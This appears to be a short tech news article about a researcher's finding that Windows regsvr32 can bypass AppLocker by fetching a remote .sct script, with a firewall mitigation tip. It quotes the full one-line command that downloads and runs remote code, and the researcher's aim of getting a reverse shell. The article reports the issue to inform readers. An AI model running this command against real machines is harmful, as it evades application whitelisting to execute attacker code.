A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsrvr32 (regsrvr64 in 64-bit versions) – a whitelisted function in Windows, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.
“So, I have been working this out the last few days. I was trying solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.”
Smith’s solution to the problem looked like this:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Effectively, he used a URL as a script, a function of regsvr that was not commonly known to exist.
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.
The crux of Smith’s discovery is, by using regsrvr32/regsrvr64, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concern about it can disable regsvr in either Windows Firewall or their own third-party firewall.
44.5” Curved 800R OLED UWQHD (3440 X 1440), 21:9. 99% DCI-P3 Color Gamut, HDR10 Support.…
The perfect combination between desktop performance and laptop design, the new Razer Blade 18 sets…
PCIe Gen 5 ready, designed with native PCIe 12+4pin modular interface. Compatible with Intel ATX…
Acer EI491CUR Sbmiipphx 49" 1800R 32:9 Curved DQHD (5120 x 1440) Zero-Frame Gaming Monitor, AMD…
Coiled keyboard cable with professional, expert sleeving USB Type A to USB Type C powder…
Cloud-soft Comfort: Float away with the dreamy G713 white gaming keyboard with comfy, cloud-shaped palm…